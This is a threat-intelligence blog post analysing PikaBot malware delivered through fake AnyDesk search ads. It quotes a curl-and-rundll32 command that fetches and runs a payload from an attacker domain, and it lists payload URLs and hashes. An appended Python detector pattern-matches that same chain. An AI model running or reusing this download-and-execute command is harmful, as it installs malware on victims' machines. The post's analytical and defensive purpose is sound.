URL:
https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads
Submission: On January 04 via api from DE — Scanned from DE
THREAT INTELLIGENCE
PIKABOT DISTRIBUTED VIA MALICIOUS SEARCH ADS
Posted: December 15, 2023 by Jérôme Segura

During this past year, we have seen an increase in the use of malicious ads (malvertising), specifically those served via search engines, to drop malware targeting businesses. In fact, browser-based attacks overall have been a lot more common if we include social engineering campaigns.
Criminals have found success in acquiring new victims through search ads; we believe there are specialized services that help malware distributors and affiliates bypass Google’s security measures and set up a decoy infrastructure. In particular, we saw similarities with the malvertising chains previously used to drop FakeBat.

In the past few days, researchers including ourselves have observed PikaBot, a new malware family that appeared in early 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns, similarly to QakBot, and emerged as one of the preferred payloads for a threat actor known as TA577.

In this blog post, we share details about this new campaign along with indicators of compromise.

PIKABOT VIA MALSPAM

PikaBot was first identified as a possible Matanbuchus drop from a malspam campaign by Unit 42 in February 2023. The name PikaBot was later given and attributed to TA577, a threat actor that Proofpoint saw involved in the distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt Strike. More importantly, TA577 has been associated with ransomware distribution.

Researchers at Cofense observed a rise in malspam campaigns delivering both DarkGate and PikaBot, following the takedown of the QakBot botnet in August 2023.

A typical distribution chain for PikaBot usually starts with an email (hijacked thread) containing a link to an external website. Users are tricked into downloading a zip archive containing a malicious JavaScript.
The JavaScript creates a random directory structure and retrieves the malicious payload from an external website via the curl utility:

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gkooegsglitrg\Dkrogirbksri & curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll

It then executes the payload (DLL) via rundll32:

rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter

As described by OALabs, PikaBot’s core module is then injected into the legitimate SearchProtocolHost.exe process. PikaBot’s loader also hides its injection by using indirect syscalls, making the malware very stealthy.

DISTRIBUTION VIA MALVERTISING

The campaign targets Google searches for the remote desktop application AnyDesk. Security researcher Colin Cowie observed the distribution chain, and the payload was later confirmed to be PikaBot by Ole Villadsen.

We also saw this campaign via a different ad impersonating the AnyDesk brand, belonging to the fake persona “Manca Marina”:

A decoy website has been set up at anadesky[.]ovmv[.]net:

The download is a digitally signed MSI installer. It’s worth noting that it had zero detections on VirusTotal at the time we collected it. However, the more interesting aspect is how it evades detection upon execution. The diagram below from JoeSandbox summarizes the execution flow:

MALVERTISING SIMILARITIES WITH FAKEBAT

The threat actors are bypassing Google’s security checks with a tracking URL via a legitimate marketing platform that redirects to their custom domain behind Cloudflare. At this point, only clean IP addresses are forwarded to the next step. They perform fingerprinting via JavaScript to determine, among other things, if the user is running a virtual machine. Only after the check is successful do we see a redirect to the main landing page (decoy AnyDesk site).
What’s interesting is that there is a second fingerprinting attempt when the user clicks the download button. This is likely to ensure that the download link won’t work in a virtualized environment. In this particular campaign, the threat actor is hosting the MSI installer on Dropbox.

We noticed that previous malvertising chains used the same redirection mechanism via onelink[.]me as well as the same URL structure. These incidents were previously reported to Google and targeted Zoom and Slack search ads:

In some of these instances, we had identified the payload as FakeBat. This is particularly interesting because it points towards a common process used by different threat actors. Perhaps this is something akin to “malvertising as a service”, where Google ads and decoy pages are provided to malware distributors.

CONCLUSION

Several years ago, exploit kits were the primary malware distribution vector via drive-by downloads. As vulnerabilities in the browser and its plugins became less effective, threat actors concentrated on spam to target businesses. However, some did continue to target browsers but instead had to rely on social engineering, luring victims with fake browser updates.

With malvertising, we see another powerful delivery vector that does not require the user to visit a compromised site. Instead, threat actors are piggybacking on search engines and simply buying ads that they know their target will be exposed to. As we may have said before, businesses can prevent this risk by only allowing their end users to install applications via their own trusted repositories.

Malwarebytes detects the malicious MSI installers as well as the web infrastructure used in these malvertising campaigns. We have reported the malicious ads and download URLs to Google and Dropbox respectively.

Special thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help and feedback.
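The cmd.exe, curl and rundll32 chain shown in the malspam section above is straightforward to spot in endpoint process-creation telemetry. The following is an added example (not code from the Malwarebytes post) that flags a curl download written to disk as a .dll and correlates it with a later rundll32 launch of that same DLL, run over constructed events; the host names and paths in the sample are placeholders.

```python
import re
from typing import Dict, List

# Constructed process-creation events (not real telemetry) mirroring the malspam
# chain above: cmd.exe makes a random directory, curl saves a remote .dat there
# as a .dll, rundll32 calls its export. Events 3 and 4 are benign and must not
# alert. Host names and paths are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "cmdline": r'"C:\Windows\System32\cmd.exe" /c mkdir '
                           r'C:\Gkooegsglitrg\Dkrogirbksri & curl '
                           r'https://keebling.example/Y0j85XT/0.0347.dat '
                           r'--output C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll'},
    {"id": "2", "cmdline": r"rundll32 C:\Gkooegsglitrg\Dkrogirbksri\Wkkfgujbsrbuj.dll,Enter"},
    {"id": "3", "cmdline": r"curl https://updates.example/agent.msi --output C:\Temp\agent.msi"},
    {"id": "4", "cmdline": r"rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# curl <url> ... --output|-o <path ending in .dll>
CURL_DLL_RE = re.compile(
    r'\bcurl\b.*?\b(https?://\S+).*?(?:--output|-o)\s+"?([^\s"]+\.dll)"?', re.I)
# rundll32 <dll path>,<export name>
RUNDLL_RE = re.compile(r'\brundll32(?:\.exe)?\s+"?([^\s",]+\.dll)"?,(\w+)', re.I)
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per suspicious event, with the reasons it fired."""
    alerts: List[Dict[str, str]] = []
    fetched: Dict[str, str] = {}  # lowercase DLL path -> id of the curl event
    for ev in events:
        cmd = ev["cmdline"]
        m = CURL_DLL_RE.search(cmd)
        if m:
            url, dll = m.group(1), m.group(2)
            reasons = ["curl writes a .dll to disk"]
            if not url.split("?")[0].lower().endswith(".dll"):
                reasons.append("URL extension differs from the .dll written")
            if "mkdir" in cmd.lower():
                reasons.append("directory created in the same command line")
            fetched[dll.lower()] = ev["id"]
            alerts.append({"id": ev["id"], "reason": "; ".join(reasons)})
            continue
        m = RUNDLL_RE.search(cmd)
        if m:
            dll, export = m.group(1).lower(), m.group(2)
            if dll in fetched:  # the DLL curl just wrote is now being executed
                reason = f"rundll32 calls {export} in DLL fetched by event {fetched[dll]}"
            elif not dll.startswith(SYSTEM_DIRS):
                reason = "rundll32 loads a DLL outside the system directories"
            else:
                continue
            alerts.append({"id": ev["id"], "reason": reason})
    return alerts
```

Calling analyze(SAMPLE_EVENTS) alerts on events 1 and 2 only; the second alert names the curl event that wrote the DLL, which is the correlation an analyst needs to tie the download to the execution.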
INDICATORS OF COMPROMISE

Malicious domains
anadesky[.]ovmv[.]net
cxtensones[.]top

Dropbox payloads
dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq
dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1&rlkey=qbtes3fd3v3vtlzuz8ql9t3qj

PikaBot hashes
0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5
da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff
69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320